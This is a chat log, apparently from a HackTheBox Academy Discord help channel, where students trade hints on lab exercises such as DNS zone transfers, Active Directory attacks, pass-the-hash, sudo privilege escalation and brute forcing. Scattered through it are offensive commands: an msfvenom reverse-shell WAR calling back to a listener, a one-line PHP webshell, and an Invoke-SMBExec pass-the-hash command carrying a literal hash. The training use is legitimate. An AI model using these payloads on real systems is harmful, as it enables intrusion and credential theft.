On information gathering: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
I am getting: Server: 75.75.75.75
Address: 75.75.75.75#53
** server can't find inlanefreight.htb: NOTIMP
; Transfer failed.
Same if I use the IP
I have the IP linked to the domain name in my /etc/hosts
There's a module before ad enum in the pen tester job role path all about pivoting and port forwarding
Remove the ip from your etc hosts and try again with the ip
got the same result with nslookup
a.root-servers.net does not work
root.inlanefreight.htb did not work
dig inlanefreight.htb @10.129.44.174 command returned root.inlanefreight.htb
nslookup inlanefreight.htb 10.129.44.174 returned *** Can't find inlanefreight.htb: No answer
I thought I had to have it in my /etc/hosts?
so dig ns worked like someone recommended in the comments earlier
why does that particular command work and why do I have to keep the /etc/hosts empty of the link between the two. It doesn't make sense.
I guess just try with and without it in /etc/hosts?
still doesn't explain why dig ns worked
nslookup -type=any -query=AXFR inlanefreight.htb failed as well
once you've impersonated that user, you functionally are that user
and they might not have impersonation privileges
take note that in that section, the command to revert is REVERT iirc
You need to add the ip after the domain
Yeah, thanks, that worked
I was misled by this
The lesson made it seem like just the domain name
Can someone please help with AD Enumeration & Attacks - Skills Assessment Part 2
Last 2 questions.
I've been at it for a week now not sure how to compromise DC01 to get the admin flag and NTLM hash for krbtgt. Please help 🙏
I'd have to boot up the lab to see, but I'm currently working on something else right now
but iirc there's a command that will just return a list of users that you can impersonate
I can't find the ./patterns file in the cheatsheet
is that in the github page, because there are some patterns files there it seems
and how can I tell when I need to have the ip in my /etc/hosts file or not?
it works for some, and not for others
is there any point in looking at the beginning of a walkthrough up to the point where I am stuck and then stopping? is this a good idea for the privilege escalation portion of the module? that portion of the module is kind of telling you how to do the privesc but I'm thinking I was stuck on that module for a while and now took a couple weeks off from it. what do you think?
understandable o7
.htb is not a valid top level domain, so all of the DNS techniques that you want to use require you to declare the spawned server as the DNS server
It's not going to, that tool is for registered websites
Any tips on the second question?: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.
I was thinking use gobuster, but I don't have a patterns file
I found the answer by guessing, I just would like to know how to arrive at the answer
Honestly it's something you may have to Google to really understand
Take a look at your query answers
And think how it could lead you to that answer
These?
How do I hide spoilers, I wanted to clarify something.
Do I need to have the ip and domain in the etc/hosts file for these questions?
Found this WITH the etc/hosts file
But that doesn't work for question 2
It's doable without
This section is all about using command line tools, axfr (zone transfer) will give you some answers
Do I need to do anything else to set up my system in regards to dns?
It actually looks like there are over a dozen zones
so I'm not sure why the answer is what it is for the second question
Think about the answer you got
but I can't access them to find the txt file
And look at all the info you're given
Perhaps you need to dig one level deeper
For the txt file
so I have inlanefreight.htb and then I have the nameserver=xxxxxxxx
and then a bunch of subdomains
like 20 of them
that's not the answer though
Since there's so few
Go shortest length to longest
A.inlanefreight.htb is gonna be your hint (A being any subdomain)
Since you're seeing some that are a.b.c...inlanefreight.htb
Don't ask just try
I don't see any with a, b, c
Always try your thought then ask if it doesn't yield results
Because those are placeholders
here's one example
A being one level of subdomain, b being another etc
Try with dig axfr
Your command isn't wrong
I would but I'm in the active enumeration section
You're expected to get failures on the ones you're not meant to access
I used "ip" in place of "nameserver" so you can properly move on
And since it's a public site the name server resolves through public dns
So how would I normally do that?
Also the nameserver wouldn't be root.inlanefreight.htb
All they give in the first question is the domain
Like there's a lot about dns that either you or the module glossed over
Yes
And from the domain you can find the nameserver
Okay, so trial and error found it!
Thank you!
Sorry it just seemed weird to go through manually one by one
You can create a simple bash script that can go through them
Still don't understand why there are only x zones.
Is there a hint you can give me without a spoiler?
Is it lower than you thought?
WAAYYYY lower!!!
I thought it was over a dozen
because of all the subdomains
there's nothing in the text of the outputs where I can clearly see "x" zones
I wish I could post spoilers
It's painfully obvious when you see it
SOA
tfw you spend 30 mins on a question only to realize you had it in the first 2 because of case sensitive answers
For skill assessment part 2 in ad enum and attacks, how do I gain access to the DC as user CT*?
-type=SOA
What tool will show me the SOAs?
I have winrm to MS01 as admin but not sure where to go from here
Nslookup
Let the hound guide you
I mainly use dig, as nslookup is just painfully limited
i tried: dig any inlanefreight.htb @<IP>
o,o
connection failed, timed out, host unreachable
do I have to remove /etc/hosts for this?
I'm so confused what is going on
Okay, found it with dig, had to respawn the machine, something was wrong.
Nslookup, despite its limitations, allows you to make specific queries without additional fluff
Dig is just superior at providing the more broad info
I'm so confused ;-;
The hound that's good with tracking
I'm currently RDPed in MS01, followed the instructions of the hound
Ponder the hound?
I've done the abuse info
Idk what I'm missing here
I'm so close
How do I decide which user to add to the domain admins
you could always make a new user and then add that user to domain admins
or just add yourself
Exception calling add with 1 argument
Wtf.
I can't execute add domaingroupmember without an error
Hi there. No I’m proper stuck on this! Obvious to some people but clearly not obvious to others. I’m ok with a challenge but this is frustrating. The module should teach all the required techniques! Shouldn’t have to go digging through other modules which is what I’m currently doing! Please let me know if you find anything useful as I’m proper out of ideas here
To get the password you may need to look for an important file
Browsing available files will give you credentials
I've created a new user alrdy
Exact same way as stated
Hmmm
Power view is taking it as null though
Are you in admin powershell?
I'm running the powershell as admin
Lol
Available files? Where? On the SQL server? I see IMAP, so thinking I could enumerate that, not sure why a file with a password hash would be there tho
Can you remind me what you're working on?
Just so I can properly guide you
I've attempted adding another user, worked. Now just have to figure out how to access the DC now @wary plover
Attacking SQL Databases
Trying to find password for MSSQLsvc
From Attacking Common Services, yes?
👍
Read the section carefully I believe it tells you what you need to know
I am checking my notes in a moment
Sorry but I've done that, hence why I’m asking here
I’ll eat my words if the section notes explain it
I haven't updated my notes for common Services
Hash stealing
You have access to the sql server as the base user (not all databases, but that's not necessary)
Ok, I’m clearly well out my depth here. I do yes but I cannot find any hashes
I take donations
It's in the section
Ok thanks
Basically ctrl+f for those keywords and the module section will take it from there
I was told by staff I cannot charge for my assistance
But seriously don't
Anyway gl
is it possible to reset a module? stepped away for a bit an want to restart
You can just go from the top
And if you were taking decent or any notes: you'll be able to easily pick it up
Instances have their own lifetime that can be extended up to like 6 hours
But by default are only set to like 1-2
But when they die/you reset them any and all progress is lost
*unless progress was related to pwning a user
Otherwise that seems more of a question to message support for rather than randomly ask on discord
Yes answers are retained
And any pregenerated info
Like internal pivots
(Shells & payload module, skill assessment targets)
Otherwise some of it would be a pain in the ass to troubleshoot
Being able to narrow down the points of failure is important
User or htb (usually user)
Did you manage to solve it? I found that the cache changed, try looking through the tmp again and use the other ccache keytab
For the answer regarding the linux01$ user: the realm hides a daemon you must find
I havent gotten that far yet hahaha still getting Julios flag
Also they do throw some expired ccaches in there
Just to keep you on your toes
i realized it after spending 30mins reading through the whole section all over again
great, now the julio.txt file does not work -.-
The execute permission was denied on the object ‘xp_subdirs’ is as far as I get following the content in the module
Check your listener
Responder or the impacket smb one
Just realized i only copied part of the flag -.-
Using responder but the syntax is pretty simple
And you have it set to use -I tun0
Still the same! Jesus, I give up, thanks anyway 👍
Your tun0 ip?
Also scroll up on the section
Maybe it's not enabled
And you need to enable
For the "Pass the Ticket (PtT) from Linux" module, can anyone give me a hint with the last question "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "
There is a keytab file under /etc/krb5.keytab i am guessing thats the keytab file for the machine and I have to impersonate that, but i am not sure how to use that :/
guys i have a question
i solved this module step : https://academy.hackthebox.com/module/77/section/853
but i wanna know why in this part
||works only when i called from /home/.., but if i called directly like sudo ./monitor.sh dont works||
The sudo privs are specifically for the full path.
i am a little confused
so whenever i use sudo this means i use the root user to call it, am i right ?
Yes.
but
why can i use sudo anywhere in my linux ?
i mean for example
if i try to run sudo monitor.sh in my linux it works
but when i try to use that in the target it doesn't work
If the sudo privs were set up that way, you could. The way this is set up, they won't.
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
This is the only thing you are allowed to do with sudo, as your user.
ohh i understand now
so linEnum in this case
lists all the files that can be run directly using the full path
i am right ?
For the purposes of this module, yes.
in this case NOPASSWD means no password is required for that specific file
?
but if i try another file
Yes, it means you can run sudo without password.
Cheers
https://academy.hackthebox.com/module/18/section/2100
this module is all about system logs. im searching for auth.log but can't seem to find it in my own machine but there is on pwnbox. im wondering where i can see it or if there is something im missing about...
you're given an IP:PORT, did you check what is running over it before jumping to port 445?
Try again. I had the same issue
in the Password Attack Lab - Medium I found the|| zip file ||to crack but when I use ||zip2john ||to get the hash I get this massive wall of hash that seems way too big to be cracked. Am I doing something wrong?
@rustic sage hi I need help with skills assessment Part 2 getting on to dc01.
Would appreciate a nudge forward
did you try to crack it anyway?
Hi
Sure, dm me
ayo
i did try with a wordlist or two and both failed, then i just went with|| john zip.hash|| and my cpu went on an adventure ... the hash i got is like a page long as opposed to a line or so that we see in examples
I'm not getting the reverse shell. I've created the payload: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f war > runme.war
Payload size: 1105 bytes
Final size of war file: 1105 bytes
as for the wordlist use the mutated one
but when i upload it to tomcat service it just doesn't give me a session, is it because there are some firewall rules ?
cont :The Live Engagement
mmm let me try that
mod :SHELLS & PAYLOADS
have you deployed the "payload" from the administration panel?
I'm working on apache tomcat, not on the blog
i hate myself... it worked thanks for the assist ... totally forgot about the custom rule
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v -l -p 4444
the multi handler >
?
on it
didn't work
msf6 exploit(multi/handler) > set lhost 10.10.14.61
lhost => 10.10.14.61
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.61:4444
even tho in tomcat the running status is true
yes
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > options
through this :xfreerdp /v:10.129.163.142 /u:htb-student /p:HTB_@cademy_stdnt! /drive:/home/kali/Desktop
i grabbed the payload from the local
hello friends, i am at AD Enumeration & Attacks - Skills Assessment Part I, to reach MS01 i tried getting reverse shells from the webshell, all msf sessions are dying and netcat freezes , sometimes i can proxy and get rdp to MS01 but not for more than 10 minutes then it freezes, i have been trying for 3 days now but can't make any progress because of this, nothing is stable, are there any tips please
Hi. I am currently stuck at Attacking Common Services Easy after obtaining the web shell. I am probably missing something obvious, but I am not able to pass commands that contain whitespace etc. URL encoding does not help. So that means I am stuck with one-word commands. What am i missing? 😦
Sounds like your connection isn't great. Switch your VPN to TCP, instead of UDP.
it is TCP, i will try to change it anyway
Are you positive? Every time I've heard this complaint, it's been that the VPN is UDP.
Something probably wrong with your url command or your web shell. Url encoding spaces as %20 should work
yes i had this issue before and fixed it by changing to TCP, i will try to download it again and see what will happen
i just deleted my response because i realised i made a critical error in simply reading. i'm so sorry but your question cleared things up i think. i will reattempt. thanks!
no worries everyone make mistakes
The webshell is pretty textbook with <?php echo shell_exec($_GET['cmd']); ?> and both cd C%3A%2F and cd%20C%3A%2F seem to fail. Is it because i am going through the browser and not curl?
Need help with Password Attacks/Credential Hunting in Linux module.
||I am ssh'd in as kira, i see the .mozilla directory, firefox_decrypt didn't work with the newest version (python3.9+ required) so i used an older one that works on the target. Running the older firefox_decrypt, it asks me for the master password. I tried a few passwords but can't get it... what am i missing? ||
Why are you sending windows commands at a Linux box?
are you sure python3.9 isn't available on the target machine?
||kira@nix01:~$ python3 --version
Python 3.8.10||
try whereis
It is a Windows server?
argh. thank you. But then will it still ask me for the master password or not?
I don't remember honestly
Ah okay, thanks anyways 😄 maybe it will help!
I figured it out... ||there is no password needed omfg hahaha||
Oh. You’re right. I misread my own notes. 😅
Try sending direct commands rather than cd. I.e. dir
I dont understand what happened, but I guess something worked and spaces etc are ok now. Thanks!
Hi
Is somebody able to help me with this question ?
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
im connecting with Julio's hash in RDP, i make the command with the MS01 hash to get a shell, i launch nc.exe -lvnp 8001, in another rdp i import Invoke-TheHash and i launch the command Invoke-SMBExec -Target 10.129.25.219 -Domain inlanefreight.htb -Username julio -Hash JULIOHASH -Command "powershell -e base 64".
i get a rev shell on the netcat instance but i can't get to the c:/julio directory
You want to pass the hash to dc01 not ms01, so your ip is wrong
And in your reverse shell you need to put the internal ip of ms01
I think you made ms01 connect to itself
yes, when i do that
Invoke-SMBExec -Target dc01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e base64payload"
with the ip 172.XX.XX.XX i can't get rev shell
Your payload uses 172.x.x.x too? And not 10.x.x.x?
yep
the command looks fine to me, you are making sure to run nc on the windows machine (ms01) and not your own attack box right?
i make the command with rdp on julio user yes
can we move to DM ? i will send the exact command to avoid spoilers
you can send me the command, but I don't have notes on what exactly I typed, so I'm not sure if I would notice any errors
How do you upload the file with RDP into windows machine ?
I just do a copy/paste and the hash doesn't work on windows powershell
Please help or hint me
use windapsearch
you can use the /drive tag when using xfreerdp to mount a directory on your machine as a shared drive on the target machine
Thx
I will do some research on windapsearch to know how it works and more information about the /drive tag on xfreerdp for a better understanding of what i do. 🙏🏻
oh the windapsearch wasn't for you
Ok i don't check this ^^
here is some info about the /drive thing if you need https://www.mankier.com/1/xfreerdp#Options-/drive
xfreerdp is an X11 Remote Desktop Protocol (RDP) client which is part of the FreeRDP project. An RDP server is built-in to many editions of Windows.
Thx a lot. It was easier to get the flag with /drive....
And thank you for the link too!
Yea I figured it out, thx for asking
🔥
Okay. If you deleted my message, why was it deleted?
i didn't, but probably because it contains a spoiler, which it kinda does even if you didn't get the answer
updating can solve the error of [-] Exploit failed: NoMethodError undefined method 'split' for nil:NilClass ?
in shells&payloads
skill assessment
yeah but it won't update
i've been updating it for 2 minutes and it's still at 0%
I truly enjoy the modules you author
so anyone knows why my exploit (50064.rb) is giving me [-] Exploit failed: NoMethodError undefined method 'split' for nil:NilClass ?
im in host-2 in shells&payloads btw
I am not sure what to use here. When I use -U , it gives me some info about the user but not anything related to the OU
hint ||dump all||
http://dontasktoask.com/ better if you add some context on what you are trying to do and what fail instead of "here is a error what's wrong?"
is that what the --da tag stands for
just use --help instead of asking me 🤣
So , im in shells&payloads skill assessment and i need to hack host-2 , but when i try to run the exploit it gives me that error that i mentioned before , here are some people that had the same problem as me : ||https://forum.hackthebox.com/t/reverse-shell-payloads-the-live-engagement/256730/3||
so i would like to know what i have to do to solve this error
the issue in that post is probably because the guy used the Host-2 ip for LHOST
where's the LHOST set?
maybe send a screenshot of what parameters you set for the module
really? probably the ip of the machine that you're on 🤣 and if you are still wondering which ip on the machine then probably the one in the same network as the target
yeah if he asked a good question that explained in detail what he was doing (with screenshot), what failed and what he is trying to do we wouldn't have this conversation 😂
using the 'dump all' command doesn't give me much info either? when it prompts me for a password I just press enter
just look at the example 😅
@dire sage read #welcome and #rules after that use /verify at #bot-commands to send your screenshot here
i will after finishing this module
vhost should be the url and targeturi can stay /
try it
same error : (
mb set vhost to just "blog.inlanefreight.local"
worked : )
thank you so much
why did i leave the targeturi as / ?
forget it , with the link it works too
its for when the website is on a subdirectory like blog.inlanefreight.local/superblog/index.php or something, then you'd put "superblog" as targeturi
ohhhhh
ok ok
thanks for the explanation
and why did i need to specify the vhost if it was saying that it wasn't needed in the exploit ? (probably a stupid question)
you mean it was an optional parameter? it's only optional if there is no vhost, so if the blog is on inlanefreight.local you don't need to specify it, but since it's on blog.inlanefreight.local you need to point it to the vhost. Vhost is for when several websites are hosted on the same ip; if you don't specify the vhost but you target the url by ip the server won't know if you meant to browse to blog.inlanefreight.local, inlanefreight.local or somethingelse.inlanefreight.local
so if i only wanted to exploit the inlanefreight.local without the subdomain , the vhosts wouldn't be needed?
yes
oh ok , thanks for the help
I don't see an example where they use the --full tag. Do I skip the password when prompted? Thats what I have been doing
hint you use the --full tag to dump all but you didn't specify dump what and i think one of the example command for this tool have the right to dump just the OU but i just dump everything and look for answer
Okay . When prompted for a password do I skip that part? That is what I have been doing
i have no note about that part plus the section have anonymous in the name so i think yea
Guys, I'm doing Footprinting Lab - Hard, do you have any idea where to start? SNMP doesn't seem to be on the right track.
What do you mean?
@fathom pendant I've tried everything, but nothing works.
Explain "everything". I'm sure the answer is in your output, but you're ignoring it because you think it's incorrect.
Like Thanos said: Fine, I'll do it myself.
I'm literally trying to help you lol
And like I said, it's probably in your output, but you overlooked it.
If you haven't gotten the public string
Guys, I'm doing the Web Attacks module, Bypassing Basic Authentication topic. I'm trying to replicate the OPTIONS request to the lab, but in the response headers I can't find any "Allow" field. Is this normal or am I doing something wrong? Command I used --> curl -i -X OPTIONS http://SERVER_IP:PORT/
OPTIONS is the HTTP request method: https://curl.se/docs/manpage.html > Look for --request
I'm sorry, I don't get it.
Thank you anyway.
I just wanted to enumerate the methods that the application accepts by doing the request I showed in the previous comment, and I'd like to know why the application doesn't show me these results. I know it's an HTTP method 😅
On Host-3 in Shells & Payloads I already have an ||aspx shell|| on the machine, but I can't access the administrator folder. Do I need to do privilege escalation, or is there another way to get access to the machine without it being through a ||webshell||?
I thought maybe about ||ms17_010||.
But it looks like it says exploit completed, but no session was created, and it also says "Overwrite complete... SYSTEM session obtained".
Which I assume means I'm using the wrong payload when I try to exploit it via ||ms17_010||.
I found these three pieces of info for the machine I'm working on. Could someone help guide me in choosing the correct payload when I exploit using Metasploit? ||druid-core-0.17.1 ~ /root/druid/bin ~ netty-transport-native-epoll-4.1.42.Final-linux-x86_64||
Should I set this? TARGETURI / yes The base path of Apache Druid
Hello,
Does anyone experience problems with the connection to the target in the final skill assessment of brute forcing? When I input the socket into the browser I get an "Unable to connect" error message. 🙂
Hey friends, is there a way to compile tools myself? I need chisel.exe.
Is that an Academy module? If not, read #welcome and #rules, after that use /verify at #bot-commands and ask that at #boxes if you are working on a box on the main platform.
Which module?
Just use the releases one.
The one where you have to brute force the SSH connection. The last one.
Oh, I mean the name of the module that you are on.
Thank you for your hard work, it's just I don't know how to do it, what to do after downloading it 😅
Releases
The releases are precompiled, you can just download and use the version that you need.
Just download the asset which you need.
Oh sorry, it's just I have to extract it 😂 Thank you both.
Login Brute Forcing. https://academy.hackthebox.com/module/details/57
So you are in Skills Assessment - Service, right?
For this, after getting the creds like the question said, you can log in via SSH.
Also this makes sense: the only open port is SSH, so you can't use a browser.
Can anyone help me with the Introduction to Bash Scripting Conditional Execution?
```bash
#!/bin/bash
# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}; do
    var=$(echo -n "$var" | base64)
    if [ $counter -eq 35 ]; then
        echo -n "Number of characters in the 35th generated value of var: "
        echo -n "$var" | wc -c
        break # Stop the loop after the 35th iteration
    fi
done
```
I used this script but it gives me an answer, but HTB says it's wrong.
Try echo without the -n.
Still gives me the wrong answer.
Also a tip for sending bash in Discord is 3 ` at the top and bottom of your code, and add bash next to the first 3, and you will get
```bash
echo 'test'
```
Oh, it's wrong by 1 number for some reason.
At the end it's a 5, not a 4.
Try double brackets:
```bash
if [[ $counter -eq 35 ]]
```
```bash
# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}; do
    var=$(echo -n "$var" | base64)
    if [[ $counter -eq 35 ]]; then
        echo "Number of characters in the 35th generated value of var: "
        echo "$var" | wc -c
        break
    fi
done
```
So I am using this now, and I changed the -n and the double brackets.
Oh sorry, I mean try
```bash
var=$(echo "$var" | base64)
```
Yes, thank you.
Found this issue: if you remove all -n you will get the right answer (without getting the last number wrong).
I don't know if it is that simple. I do need to log on to the website, then to the server to perform brute forcing of SSH. Usually I just input the socket and I would open the website.
Hello. I have a question. I have Termux on my phone, could I use it to SSH into the target instead of using the PwnBox?
Or is that not an option?
Hi guys, I am giving my course for free on Linux and Shell Scripting.
If you want to learn, then start learning with the below link and enroll in the course.
The assessment that you are on has nothing to do with the previous one, so if you have the creds you can just log in via SSH.
It is, but this isn't the right place for that. Verify your account and ask that in like #general.
Aha. Ok. Thanks.
@open ember Also if you have the PwnBox creds you can just log in via SSH from anywhere.
I know, but it doesn't seem to work from Termux.
Not really the right place for this.
Umm, how do I verify my thing in here?
Okay, sorry, just wanted to reach more people!
Read #welcome and #rules, after that use /verify at #bot-commands.
